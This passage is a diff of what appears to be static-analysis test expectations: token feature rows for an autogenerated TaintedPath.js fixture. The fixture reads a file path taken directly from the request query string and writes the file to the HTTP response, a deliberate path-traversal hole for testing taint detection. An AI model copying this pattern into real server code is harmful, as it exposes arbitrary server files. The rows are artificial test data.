query)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:75 | exceptional return of res.wri ... query)) | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:75 | exceptional return of res.wri ... query)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:75 | exceptional return of res.wri ... query)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:75 | res.wri ... query)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:75 | res.wri ... query)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:75 | res.wri ... query)) | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:75 | res.wri ... query)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:75 | res.wri ... query)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:79:9:79:13 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:9:79:13 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:9:79:13 | write | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:9:79:13 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:9:79:13 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:79:15:79:16 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:15:79:16 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:15:79:16 | fs | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:15:79:16 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:15:79:16 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:79:15:79:29 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:15:79:29 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:15:79:29 | fs.readFileSync | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:15:79:29 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:15:79:29 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:79:15:79:74 | exceptional return of fs.read ... .query) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:15:79:74 | exceptional return of fs.read ... .query) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:79:15:79:74 | exceptional return of fs.read ... .query) | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:15:79:74 | exceptional return of fs.read ... .query) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:15:79:74 | exceptional return of fs.read ... .query) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:79:15:79:74 | fs.read ... .query) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:79:15:79:74 | fs.read ... .query) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:79:15:79:74 | fs.read ... .query) | contextFunctionInterfaces | views_local(req, res) | @@ -5381,6 +60938,41 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:79:15:79:74 | fs.read ... .query) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:79:15:79:74 | fs.read ... .query) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:79:15:79:74 | fs.read ... .query) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:79:18:79:29 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:18:79:29 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:18:79:29 | readFileSync | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:18:79:29 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:18:79:29 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:37 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:37 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:37 | require | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:37 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:37 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:52 | exceptional return of require ... tring") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:52 | exceptional return of require ... tring") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:52 | exceptional return of require ... tring") | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:52 | exceptional return of require ... tring") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:52 | exceptional return of require ... tring") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:52 | require ... tring") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:52 | require ... tring") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:52 | require ... tring") | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:52 | require ... tring") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:52 | require ... tring") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:58 | require ... ).parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:58 | require ... ).parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:58 | require ... ).parse | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:58 | require ... ).parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:58 | require ... ).parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:67 | exceptional return of require ... eq.url) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:67 | exceptional return of require ... eq.url) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:67 | exceptional return of require ... eq.url) | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:67 | exceptional return of require ... eq.url) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:67 | exceptional return of require ... eq.url) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:67 | require ... eq.url) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:67 | require ... eq.url) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:67 | require ... eq.url) | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:67 | require ... eq.url) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:31:79:67 | require ... eq.url) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:79:31:79:73 | require ... ).query | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:79:31:79:73 | require ... ).query | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:79:31:79:73 | require ... ).query | calleeImports | fs | @@ -5398,6 +60990,16 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:79:39:79:51 | "querystring" | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | | autogenerated/TaintedPath/TaintedPath.js:79:39:79:51 | "querystring" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:79:39:79:51 | "querystring" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:79:54:79:58 | parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:54:79:58 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:54:79:58 | parse | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:54:79:58 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:54:79:58 | parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:79:60:79:62 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:60:79:62 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:60:79:62 | req | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:60:79:62 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:60:79:62 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:79:60:79:66 | req.url | CalleeFlexibleAccessPath | import(!).parse | | autogenerated/TaintedPath/TaintedPath.js:79:60:79:66 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:79:60:79:66 | req.url | calleeImports | querystring | @@ -5406,6 +61008,83 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:79:60:79:66 | req.url | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | | autogenerated/TaintedPath/TaintedPath.js:79:60:79:66 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:79:60:79:66 | req.url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:79:64:79:66 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:64:79:66 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:64:79:66 | url | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:64:79:66 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:64:79:66 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:79:69:79:73 | query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:69:79:73 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:69:79:73 | query | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:69:79:73 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:69:79:73 | query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:82:1:93:2 | (functi ... d);\\n\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:82:1:93:2 | (functi ... d);\\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:82:1:93:2 | (functi ... d);\\n\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:82:1:93:4 | (functi ... ;\\n\\n})() | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:82:1:93:4 | (functi ... ;\\n\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:82:1:93:4 | (functi ... ;\\n\\n})() | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:82:1:93:4 | exceptional return of (functi ... ;\\n\\n})() | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:82:1:93:4 | exceptional return of (functi ... ;\\n\\n})() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:82:1:93:4 | exceptional return of (functi ... ;\\n\\n})() | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:82:2:82:1 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:82:2:82:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:82:2:82:1 | require | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:82:2:82:1 | require | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:82:2:82:1 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:82:2:82:1 | this | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:82:2:82:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:82:2:82:1 | this | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:82:2:82:1 | this | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:82:2:82:1 | this | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:82:2:93:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:82:2:93:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:82:2:93:1 | 'arguments' object of anonymous function | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:82:2:93:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:82:2:93:1 | 'arguments' object of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:82:2:93:1 | exceptional return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:82:2:93:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:82:2:93:1 | exceptional return of anonymous function | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:82:2:93:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:82:2:93:1 | exceptional return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:82:2:93:1 | functio ... ed);\\n\\n} | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:82:2:93:1 | functio ... ed);\\n\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:82:2:93:1 | functio ... ed);\\n\\n} | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:82:2:93:1 | return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:82:2:93:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:82:2:93:1 | return of anonymous function | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:82:2:93:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:82:2:93:1 | return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:84:9:84:15 | express | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:84:9:84:15 | express | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:84:9:84:15 | express | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:84:9:84:15 | express | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:84:9:84:15 | express | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:84:9:84:36 | express | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:84:9:84:36 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:84:9:84:36 | express | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:84:9:84:36 | express | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:84:9:84:36 | express | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:84:9:84:36 | express ... press') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:84:9:84:36 | express ... press') | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:84:9:84:36 | express ... press') | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:84:9:84:36 | express ... press') | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:84:9:84:36 | express ... press') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:84:19:84:25 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:84:19:84:25 | require | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:84:19:84:25 | require | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:84:19:84:25 | require | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:84:19:84:25 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:84:19:84:36 | exceptional return of require('express') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:84:19:84:36 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:84:19:84:36 | exceptional return of require('express') | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:84:19:84:36 | exceptional return of require('express') | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:84:19:84:36 | exceptional return of require('express') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:84:19:84:36 | require('express') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:84:19:84:36 | require('express') | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:84:19:84:36 | require('express') | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:84:19:84:36 | require('express') | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:84:19:84:36 | require('express') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:84:27:84:35 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/TaintedPath.js:84:27:84:35 | 'express' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:84:27:84:35 | 'express' | calleeImports | | @@ -5414,6 +61093,126 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:84:27:84:35 | 'express' | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | | autogenerated/TaintedPath/TaintedPath.js:84:27:84:35 | 'express' | enclosingFunctionName | | | autogenerated/TaintedPath/TaintedPath.js:84:27:84:35 | 'express' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:85:9:85:19 | application | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:85:9:85:19 | application | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:85:9:85:19 | application | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:85:9:85:19 | application | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:85:9:85:19 | application | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:85:9:85:31 | applica ... press() | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:85:9:85:31 | applica ... press() | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:85:9:85:31 | applica ... press() | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:85:9:85:31 | applica ... press() | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:85:9:85:31 | applica ... press() | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:85:9:85:31 | application | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:85:9:85:31 | application | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:85:9:85:31 | application | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:85:9:85:31 | application | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:85:9:85:31 | application | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:85:23:85:29 | express | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:85:23:85:29 | express | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:85:23:85:29 | express | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:85:23:85:29 | express | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:85:23:85:29 | express | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:85:23:85:31 | exceptional return of express() | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:85:23:85:31 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:85:23:85:31 | exceptional return of express() | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:85:23:85:31 | exceptional return of express() | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:85:23:85:31 | exceptional return of express() | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:85:23:85:31 | express() | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:85:23:85:31 | express() | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:85:23:85:31 | express() | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:85:23:85:31 | express() | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:85:23:85:31 | express() | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:9:87:19 | views_local | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:9:87:19 | views_local | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:87:9:87:19 